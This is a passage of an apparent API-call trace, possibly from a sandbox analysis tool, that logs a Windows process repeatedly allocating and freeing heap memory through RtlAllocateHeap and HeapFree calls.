RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 